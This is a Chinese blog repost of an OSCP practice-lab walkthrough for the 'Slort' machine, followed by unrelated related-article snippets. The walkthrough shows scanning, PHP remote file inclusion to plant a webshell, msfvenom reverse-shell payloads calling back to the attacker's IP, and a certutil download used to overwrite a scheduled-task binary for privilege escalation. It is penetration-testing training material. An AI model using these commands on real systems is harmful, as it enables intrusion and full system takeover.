OSCP靶场--Slort

news2024/11/15 7:31:35

OSCP靶场–Slort

考点(1.php 远程文件包含 2.定时任务提权)

1.nmap扫描

                                                                                                                 
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.178.53 -sV -sC -p-  --min-rate 5000 
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-24 04:37 EST
Nmap scan report for 192.168.178.53
Host is up (0.28s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC                                                              
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                      
445/tcp   open  microsoft-ds?                                                                                    
3306/tcp  open  mysql?                                                                                           
| fingerprint-strings:                                                                                           
|   DNSVersionBindReqTCP, JavaRMI, LPDString, NULL:                                                              
|_    Host '192.168.45.179' is not allowed to connect to this MariaDB server                                     
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                             
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                                             
| http-title: Welcome to XAMPP                                                                                   
|_Requested resource was http://192.168.178.53:4443/dashboard/                                                   
5040/tcp  open  unknown                                                                                          
7680/tcp  open  pando-pub?                                                                                       
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                             
|_http-open-proxy: Proxy might be redirecting requests                                                           
| http-title: Welcome to XAMPP                                                                                   
|_Requested resource was http://192.168.178.53:8080/dashboard/                                                   
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                                             
49664/tcp open  msrpc         Microsoft Windows RPC                                                              
49665/tcp open  msrpc         Microsoft Windows RPC                                                              
49666/tcp open  msrpc         Microsoft Windows RPC                                                              
49667/tcp open  msrpc         Microsoft Windows RPC                                                              
49668/tcp open  msrpc         Microsoft Windows RPC                                                                              
49669/tcp open  msrpc         Microsoft Windows RPC                                                                              
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :                                                                                      
SF-Port3306-TCP:V=7.92%I=7%D=2/24%Time=65D9B8F4%P=x86_64-pc-linux-gnu%r(NU                                                       
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x20al                                                       
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersio
SF:nBindReqTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:LPDString,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Ja
SF:vaRMI,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-24T09:40:46
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.85 seconds

2.user priv

2.1 目录扫描

┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.178.53:8080/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.178.53-8080/-_24-02-24_05-44-47.txt

Error Log: /root/.dirsearch/logs/errors-24-02-24_05-44-47.log

Target: http://192.168.178.53:8080/

[05:44:48] Starting: 
[05:44:51] 403 -    1KB - /%C0%AE%C0%AE%C0%AF                              
[05:44:51] 403 -    1KB - /%3f/
[05:44:52] 403 -    1KB - /%ff                                             
[05:44:59] 403 -    1KB - /.ht_wsr.txt                                     
[05:44:59] 403 -    1KB - /.htaccess.bak1
[05:44:59] 403 -    1KB - /.htaccess.sample
[05:44:59] 403 -    1KB - /.htaccess.save                                  
[05:44:59] 403 -    1KB - /.htaccess.orig
[05:44:59] 403 -    1KB - /.htaccess_extra
[05:44:59] 403 -    1KB - /.htaccess_orig
[05:44:59] 403 -    1KB - /.htaccess_sc
[05:44:59] 403 -    1KB - /.htaccessBAK
[05:44:59] 403 -    1KB - /.htaccessOLD
[05:44:59] 403 -    1KB - /.htaccessOLD2
[05:44:59] 403 -    1KB - /.htm                                            
[05:44:59] 403 -    1KB - /.html                                           
[05:44:59] 403 -    1KB - /.htpasswd_test
[05:44:59] 403 -    1KB - /.htpasswds
[05:44:59] 403 -    1KB - /.httr-oauth
[05:45:17] 403 -    1KB - /Trace.axd::$DATA                                 
[05:45:19] 200 -  782B  - /Webalizer/                                       
[05:45:47] 403 -    1KB - /cgi-bin/                                         
[05:45:47] 500 -    1KB - /cgi-bin/printenv.pl                              
[05:45:52] 301 -  351B  - /dashboard  ->  http://192.168.178.53:8080/dashboard/
[05:45:52] 200 -    6KB - /dashboard/howto.html                             
[05:45:53] 200 -   31KB - /dashboard/faq.html                               
[05:45:53] 200 -   78KB - /dashboard/phpinfo.php                            
[05:45:59] 403 -    1KB - /error/                                           
[05:46:01] 200 -   30KB - /favicon.ico                                      
[05:46:02] 503 -    1KB - /examples                                         
[05:46:02] 503 -    1KB - /examples/                                        
[05:46:02] 503 -    1KB - /examples/servlet/SnoopServlet
[05:46:02] 503 -    1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[05:46:02] 503 -    1KB - /examples/jsp/snp/snoop.jsp
[05:46:02] 503 -    1KB - /examples/servlets/servlet/CookieExample          
[05:46:02] 503 -    1KB - /examples/servlets/index.html
[05:46:02] 503 -    1KB - /examples/servlets/servlet/RequestHeaderExample
[05:46:06] 301 -  345B  - /img  ->  http://192.168.178.53:8080/img/         
[05:46:07] 302 -    0B  - /index.php  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.pHp  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.php/login/  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.php.  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 403 -    1KB - /index.php::$DATA                                 
[05:46:21] 403 -    1KB - /phpmyadmin/ChangeLog                             
[05:46:21] 403 -    1KB - /phpmyadmin/doc/html/index.html
[05:46:21] 403 -    1KB - /phpmyadmin/docs/html/index.html
[05:46:21] 403 -    1KB - /phpmyadmin/README                                
[05:46:22] 403 -    1KB - /phpmyadmin                                       
[05:46:24] 403 -    1KB - /phpmyadmin/                                      
[05:46:24] 403 -    1KB - /phpmyadmin/index.php
[05:46:24] 403 -    1KB - /phpmyadmin/phpmyadmin/index.php                  
[05:46:24] 403 -    1KB - /phpmyadmin/scripts/setup.php
[05:46:31] 403 -    1KB - /server-status/                                   
[05:46:31] 403 -    1KB - /server-status
[05:46:31] 403 -    1KB - /server-info
[05:46:33] 301 -  346B  - /site  ->  http://192.168.178.53:8080/site/       
[05:46:34] 301 -   27B  - /site/  ->  index.php?page=main.php               
[05:46:46] 403 -    1KB - /web.config::$DATA                                
[05:46:46] 403 -    1KB - /webalizer                                        
[05:46:49] 200 -  774B  - /xampp/                                           
                                                                             
Task Completed     

2.2 发现php LFI漏洞:

在这里插入图片描述
包含phpinfo.php文件:
在这里插入图片描述

2.3 发现存在php RFI漏洞:

在这里插入图片描述

2.4 利用RFI获取webshell:

php正向webshell地址:https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php
在这里插入图片描述

2.5 转到交互式shell

##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o shell443.exe

##
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80

## webshell上传shell443.exe
## 执行shell443.exe

##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443

## local.txt
c:\Users\rupert\Desktop>type local.txt
type local.txt
345738c06042482d447a067226c9bfa7

在这里插入图片描述
在这里插入图片描述
local.txt
在这里插入图片描述

3.root priv

3.1 winpeas.exe:

## 
File: C:\xampp\phpMyAdmin\config.inc.php


在这里插入图片描述

3.2 发现定时任务:

在这里插入图片描述
在这里插入图片描述

3.3 覆盖定时任务二进制文件提权:

##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o TFTP.EXE 

##
c:\Backup>certutil -urlcache -split -f http://192.168.45.179/TFTP.EXE


##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443            

在这里插入图片描述

4.总结

## 考点:
### 1.远程文件包含
### 2.定时任务提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1469152.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Windows安装PHP及在VScode中配置插件,使用PHP输出HelloWorld

安装PHP PHP官网下载地址(8.3版本):PHP For Windows:二进制文件和源代码发布 点击下载.zip格式压缩包: 历史版本在Old archives中下载。推荐在Documentation download中下载官方文档,方便学习。 下载完成后在一个顺眼的地方解压压…

Spring Boot 项目集成camunda流程引擎

使用camunda开源工作流引擎有:通过docker运行、使用springboot集成、部署camunda发行包、基于源代码编译运行等多种方式。 其中,通过源代码编译运行的方式最为复杂,具体参考:https://lowcode.blog.csdn.net/article/details/1362…

vivado VHDL Objects、VHDL实体描述

VHDL对象包括&#xff1a;信号、变量、常量和运算符。 信号 在中声明VHDL信号&#xff1a; •体系结构声明部分&#xff1a;在该体系结构内的任何位置使用VHDL信号。 •一个块&#xff1a;在该块中使用VHDL信号。 使用<信号分配运算符分配VHDL信号。 signal sig1 : std…

企业计算机服务器中了malloxx勒索病毒怎么办?Malloxx勒索病毒解密数据恢复

网络技术的不断更新与发展&#xff0c;为企业的发展提供了强有力数据支撑&#xff0c;在企业的生产运营过程中&#xff0c;企业数据扮演着重要的角色&#xff0c;通过企业数据可以更好地总结调整企业的规划发展方向与日常数据统计&#xff0c;但利用网络技术的支撑就要防范网络…

软考41-上午题-【数据库】-关系代数运算3-外连接

一、外连接 连接的拓展&#xff0c;处理由于连接运算而缺失的信息。 1-1、回顾自然连接 1-2、左外连接 示例&#xff1a; 左边的表&#xff0c;数值是全的 1-3、右外连接 示例&#xff1a; 右边的表&#xff0c;数值是全的 1-4、全外连接 示例&#xff1a; 自然连接左外连接…

Sora:颠覆性AI视频生成工具

Sora是一款基于人工智能&#xff08;AI&#xff09;技术的视频生成工具&#xff0c;它彻底改变了传统视频制作的模式&#xff0c;为创作者提供了高效、便捷、高质量的视频内容生成方式。通过深度学习和自然语言处理等先进技术&#xff0c;Sora实现了从文字描述到视频画面的自动…

备考2024年汉字小达人:历年考题练一练-18道选择题

今天为大家分享汉字小达人的备考学习资源&#xff0c;通过参加没有报名费、人人可参加的汉字小达人比赛&#xff0c;激发孩子学习语文的兴趣&#xff0c;并且提升语文学习成绩。 汉字小达人的两轮比赛&#xff08;区级自由报名活动、市级活动&#xff09;的选择题主要有六种题型…

Mean Teacher的调研与学习

Mean Teacher的调研与学习 0 FQA:1 Mean Teacher1.1 Mean Teacher简介1.2 回顾Π-Model 和 Temporal Ensembling1.3 Mean Teacher 0 FQA: Q1&#xff0c;什么是Mean Teacher&#xff1f; MT的训练方式是怎样的&#xff1f;A1: Mean Teacher是一种基于一致性正则化的半监督学习…

【web】nginx+php环境搭建-关键点(简版)

一、nginx和php常用命令 命令功能Nginxphp-fpm启动systemctl start nginxsystemctl start php-fpm停止systemctl stop nginxsystemctl stop php-fpm重启systemctl restart nginxsystemctl restart php-fpm查看启动状态systemctl status nginxsystemctl status php-fpm开机自启…

读书笔记之《大加速》:为什么我们的生活节奏越来越快?

《大加速—为什么我们的生活越来越快》作者是 [英] 罗伯特科尔维尔&#xff0c;原作名: The Great Acceleration:How the World is getting Faster,Faster&#xff0c;2019年出版。 罗伯特科尔维尔(Robert Colvile),是一位政治评论员、作家、资深互联网媒体人。作品刊登在英国《…

《C++面向对象程序设计》✍学习笔记

C的学习重点 C 这块&#xff0c;重点需要学习的就是一些关键字、面向对象以及 STL 容器的知识&#xff0c;特别是 STL&#xff0c;还得研究下他们的一些源码&#xff0c;下面是一些比较重要的知识&#xff1a; 指针与引用的区别&#xff0c;C 与 C 的区别&#xff0c;struct 与…

【Spring MVC】处理器映射器:AbstractHandlerMethodMapping源码分析

目录 一、继承体系 二、HandlerMapping 三、AbstractHandlerMapping 四、AbstractHandlerMethodMapping 4.1 成员属性 4.1.1 MappingRegistry内部类 4.2 AbstractHandlerMethodMapping的初始化 4.3 getHandlerInternal()方法&#xff1a;根据当前的请求url&#xff0c;…

RocketMQ-架构与设计

RocketMQ架构与设计 一、简介二、框架概述1.设计特点 三、架构图1.Producer2.Consumer3.NameServer4.BrokerServer 四、基本特性1.消息顺序性1.1 全局顺序1.2 分区顺序 2.消息回溯3.消息重投4.消息重试5.延迟队列&#xff08;定时消息&#xff09;6.重试队列7.死信队列8.消息语…

智慧城市与数字孪生:共创未来城市新篇章

一、引言 随着科技的飞速发展&#xff0c;智慧城市与数字孪生已成为现代城市建设的核心议题。智慧城市注重利用先进的信息通信技术&#xff0c;提升城市治理水平&#xff0c;改善市民生活品质。而数字孪生则通过建立物理城市与数字模型之间的连接&#xff0c;为城市管理、规划…

接近于pi的程序

在一个平静的午后&#xff0c;两个神秘的数字悄然相遇了。它们分别是-1031158223和-328227871。这两个数字看起来普普通通&#xff0c;但谁知它们背后隐藏着一段令人惊叹的奇幻之旅。 这两个数字其实是π的两位探险家&#xff0c;它们决定通过一次除法运算来探索π的奥秘。它们…

浅谈密码学

文章目录 每日一句正能量前言什么是密码学对称加密简述加密语法Kerckhoffs原则常用的加密算法现代密码学的原则威胁模型&#xff08;按强度增加的顺序&#xff09; 密码学的应用领域后记 每日一句正能量 人生在世&#xff0c;谁也不能做到让任何人都喜欢&#xff0c;所以没必要…

Vue+SpringBoot打造快递管理系统

目录 一、摘要1.1 项目介绍1.2 项目录屏 二、研究内容2.1 数据中心模块2.2 快递类型模块2.3 快递区域模块2.4 快递货架模块2.5 快递档案模块 三、界面展示3.1 登录注册3.2 快递类型3.3 快递区域3.4 快递货架3.5 快递档案3.6 系统基础模块 四、免责说明 一、摘要 1.1 项目介绍 …

【Java程序设计】【C00294】基于Springboot的车辆充电桩管理系统(有论文)

基于Springboot的车辆充电桩管理系统&#xff08;有论文&#xff09; 项目简介项目获取开发环境项目技术运行截图 项目简介 这是一个基于Springboot的车辆充电桩管理系统 本系统前台功能模块分为&#xff1a;首页功能和用户后台管理 后台功能模块分为&#xff1a;管理员功能和…

博途PLC PID仿真(单容水箱液位高度控制含变积分变增益测试)

单容水箱和双荣水箱的微分方程和数值求解,可以参考下面文章链接: https://rxxw-control.blog.csdn.net/article/details/131139432https://rxxw-control.blog.csdn.net/article/details/131139432这篇博客我们利用欧拉求解器在PLC里完成单容水箱的数学建模。PLC也可以和MATL…

Vue模板引用之ref特殊属性

1. 使用实例 <template><input ref"input" name"我是input的name" /><br /><ul><li v-for"arr in array" :key"arr" id"111" ref"itemRefs">{{arr}}</li></ul> </…